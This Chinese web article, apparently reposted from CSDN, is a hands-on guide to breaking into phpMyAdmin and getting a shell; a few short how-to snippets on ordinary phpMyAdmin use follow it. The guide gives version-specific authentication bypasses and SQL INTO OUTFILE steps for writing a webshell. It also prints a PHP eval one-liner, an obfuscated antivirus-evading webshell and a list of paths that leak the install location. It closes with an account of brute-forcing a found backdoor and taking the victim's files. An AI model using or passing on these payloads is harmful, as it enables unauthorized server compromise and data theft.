分析PHPmyadmin漏洞以及拿shell的介绍-phpMyAdmin-PHP中文网

首页

数据库

phpMyAdmin

分析PHPmyadmin漏洞以及拿shell的介绍

藏色散人

Feb 10, 2021 pm 03:13 PM

phpmyadmin

下面由phpmyadmin教程栏目给大家介绍关于PHPmyadmin漏洞和拿shell，希望对需要的朋友有所帮助！

分析PHPmyadmin漏洞以及拿shell的介绍

phpmyadmin的漏洞相对来说，还是比较多的，对于新手来说，分享几个漏洞，深入的处于代码审计方面的也可以和我讨论
phpmyadmin2.11.3-2.11.4 这两个版本存在万能密码，直接使用‘localhost’@'@”为账号，密码不用输入。

phpmyadmin2.11.9.2 这个版本存在空口令。直接root用户登陆，密码不用

找这个的话用自己的写的脚本，或者搜素引擎什么的，这里懂的人就懂了，不懂也不在这里。

关于拿shell，----》root权限，并且有写文件权限 ----》导出的目录有写权限 ----》有的情况下，就算你这两个都有，但是服务器的一些配置还是会对这个有影响。

在getshell之前先进入一个数据库

第一种，使用sql语句，创建一个表，添加一个字段，字段的内容为一句话，然后导出到php文件中，最后删除这个表，这个是最保险的方法
Create TABLE 表 (列 text NOT NULL)
Insert INTO 表 (列) VALUES('89d315889e53c123d01b90add3ac9b22')
select 列 from 表 into _utfile '路径'
Drop TABLE IF EXISTS 表;
第二种方法，这个是直接写入
select '一句话'INTO _UTFILE '路径'
还有几种方法，大致原理都一样。
然后，一般的话，一句话都是

<span style="font-size: 16px;"><?php @eval($_POST[x])?><br/></span>

有狗的话，用免杀一句话，下面这个是我过年前构造的过狗一句话，现在应该还可以过

<span style="font-size: 16px;"><?php<br/> $a = &#39;s&#39;;<br/> $str = str_repeat($a,2);<br/> $to = $_POST;<br/> //echo $str;<br/> $exp = &#39;a&#39;.$str[0].$str[1].&#39;e&#39;.&#39;r&#39;.&#39;t&#39;;<br/> $exp($to[&#39;x&#39;])<br/> ?><br/></span>

找路径的话，

<span style="font-size: 16px;">1// 利用phpinfo.php<br/> 2//利用phpmyadmin的一些文件报错，下面都是网上通用的<br/> /phpMyAdmin/index.php?lang[]=1<br/> /phpMyAdmin/phpinfo.php<br/> /load_file()<br/> /phpmyadmin/themes/darkblue_orange/layout.inc.php<br/> /phpmyadmin/libraries/select_lang.lib.php<br/> /phpmyadmin/libraries/lect_lang.lib.php<br/> /phpmyadmin/libraries/mcrypt.lib.php<br/> /phpmyadmin/libraries/export/xls.php<br/></span>

3//再者就是利用网站包路径，这些会的都会了，不会的慢慢的就会了。

下面开始实战，脚本扫到一个IP，显示存在phpmyadmin，打开

一看这些php文件就是后门一句话，放到几万字典爆破，两秒钟

直接菜刀链接。。。。。
这个肯定被人搞了，直接打包好东西，你懂的。。。提权什么的就不必要了。

以上是分析PHPmyadmin漏洞以及拿shell的介绍的详细内容。更多信息请关注PHP中文网其他相关文章！

声明

本文转载于：csdn。如有侵权，请联系admin@php.cn删除

PHPMYADMIN的目的：轻松管理MySQL数据库Apr 12, 2025 am 12:14 AM

phpMyAdmin是一款基于Web的MySQL数据库管理工具。1.它支持基本的CRUD操作和高级功能，如数据库设计和性能优化。2.通过Web服务器运行，接受用户输入并转换为MySQL命令。3.基本用法包括创建数据库，高级用法支持查询优化。4.常见错误如权限不足可以通过检查用户权限解决。5.性能优化包括索引优化、查询优化和数据库设计。

MySQL和PhpMyAdmin的角色：详细的故障Apr 11, 2025 am 12:14 AM

MySQL和phpMyAdmin的角色分别是存储和管理数据、提供用户友好的数据库管理界面。MySQL通过SQL进行数据操作，phpMyAdmin通过HTTP请求与MySQL交互，转换用户操作为SQL命令。

phpmyadmin连接数据库Apr 10, 2025 pm 11:09 PM

通过 phpMyAdmin 连接数据库的方法：访问 phpMyAdmin 网站，使用凭据登录。选择要连接的数据库。在“操作”选项卡下选择“导出”选项。配置导出设置，选择格式、表和数据范围。保存导出的文件。在目标数据库中选择“导入”选项卡并浏览导出的文件。点击“执行”按钮，然后使用“查询”选项卡验证导入是否成功。

phpmyadmin怎么连接oracleApr 10, 2025 pm 11:03 PM

通过以下步骤连接 phpMyAdmin 至 Oracle 数据库：1. 安装 Oracle 驱动程序；2. 创建数据库连接，包括主机、用户名、密码、端口和类型；3. 保存设置以建立连接；4. 从 phpMyAdmin 中选择连接的 Oracle 数据库即可管理和使用它。

phpmyadmin建立数据表Apr 10, 2025 pm 11:00 PM

要使用 phpMyAdmin 创建数据表，以下步骤必不可少：连接到数据库并单击“新建”标签。为表命名并选择存储引擎（推荐 InnoDB）。通过单击“添加列”按钮添加列详细信息，包括列名、数据类型、是否允许空值以及其他属性。选择一个或多个列作为主键。单击“保存”按钮创建表和列。

phpmyadmin连接mysqlApr 10, 2025 pm 10:57 PM

如何使用 phpMyAdmin 连接到 MySQL？访问 phpMyAdmin 的 URL，通常为 http://localhost/phpmyadmin 或 http://[您的服务器 IP 地址]/phpmyadmin。输入您的 MySQL 用户名和密码。选择您要连接的数据库。点击 "连接" 按钮以建立连接。

phpmyadmin自动增长idApr 10, 2025 pm 10:54 PM

phpMyAdmin 中设置自动增长 ID 的步骤：打开 phpMyAdmin 并连接到数据库。选择要创建自动增长 ID 的表。在“结构”选项卡中，勾选“主键”部分的“自动增长”复选框。在“从”和“到”字段中输入自动增长 ID 的起始值和结束值。单击“保存”按钮。设置自动增长 ID 的优势包括：简化数据插入。确保唯一性。优化性能。易于识别。需要注意的事项：确保自动增长 ID 范围足够大。重复值可能无法